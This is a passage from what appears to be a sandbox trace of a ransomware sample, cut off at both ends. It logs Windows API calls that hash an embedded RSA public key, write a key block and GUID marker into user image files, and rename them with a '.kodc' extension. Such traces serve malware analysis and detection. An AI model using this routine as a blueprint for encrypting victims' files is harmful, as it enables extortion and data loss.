(lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.399] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.400] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.400] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.400] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.400] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.400] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.400] GetLastError () returned 0x0 [0099.400] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.401] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.401] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.401] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.401] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xdb30) returned 0x9ba6d90 [0099.401] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.401] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9b9f8 [0099.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae68 [0099.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9ba40 [0099.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae80 [0099.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aeb0 [0099.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aec8 [0099.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.401] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.401] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aeb0 | out: hHeap=0x630000) returned 1 [0099.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aec8 | out: hHeap=0x630000) returned 1 [0099.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0099.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aec8 [0099.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0099.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331aeb0 [0099.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0099.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0099.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0099.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aec8 | out: hHeap=0x630000) returned 1 [0099.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aeb0 | out: hHeap=0x630000) returned 1 [0099.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.402] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.402] GetCurrentThreadId () returned 0x42c [0099.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba5348 [0099.402] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.403] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.403] GetCurrentThreadId () returned 0x42c [0099.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.403] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.403] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.403] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.403] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.403] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.403] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aeb0 [0099.403] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.403] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0099.404] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aec8 [0099.404] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.404] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae98 [0099.404] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.404] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.404] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.404] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aee0 [0099.404] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0099.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a538 [0099.404] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0099.404] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.404] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.404] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.405] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xdb27, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.405] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.405] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.405] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.405] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.405] CloseHandle (hObject=0x5cc) returned 1 [0099.411] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bigTpE.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bigtpe.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\bigTpE.jpg.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bigtpe.jpg.kodc")) returned 1 [0099.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0099.411] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.411] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.413] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.413] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1924b830, ftCreationTime.dwHighDateTime=0x1d5c240, ftLastAccessTime.dwLowDateTime=0xa3cda770, ftLastAccessTime.dwHighDateTime=0x1d5bcc9, ftLastWriteTime.dwLowDateTime=0xa3cda770, ftLastWriteTime.dwHighDateTime=0x1d5bcc9, nFileSizeHigh=0x0, nFileSizeLow=0xe3e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B_pNpXiarzzW85.gif", cAlternateFileName="B_PNPX~1.GIF")) returned 1 [0099.413] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\B_pNpXiarzzW85.gif") returned=".gif" [0099.413] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\B_pNpXiarzzW85.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\b_pnpxiarzzw85.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.413] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=58342) returned 1 [0099.413] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.416] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe3c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.416] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.416] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.416] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.417] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.417] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xe3e6, lpOverlapped=0x0) returned 1 [0099.417] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.417] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.417] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.417] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.417] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0099.418] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.418] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.418] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.418] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.418] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.418] GetLastError () returned 0x0 [0099.418] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.418] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0099.418] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.418] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.418] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.418] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.418] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.418] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.418] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.418] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xe3f0) returned 0x9ba6d90 [0099.419] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9ba40 [0099.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae80 [0099.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9ba88 [0099.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ae98 [0099.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aec8 [0099.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aee0 [0099.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.419] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aec8 | out: hHeap=0x630000) returned 1 [0099.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aee0 | out: hHeap=0x630000) returned 1 [0099.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0099.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.419] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.419] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0099.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aee0 [0099.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0099.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331aec8 [0099.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0099.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0099.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0099.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.420] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aee0 | out: hHeap=0x630000) returned 1 [0099.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.420] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aec8 | 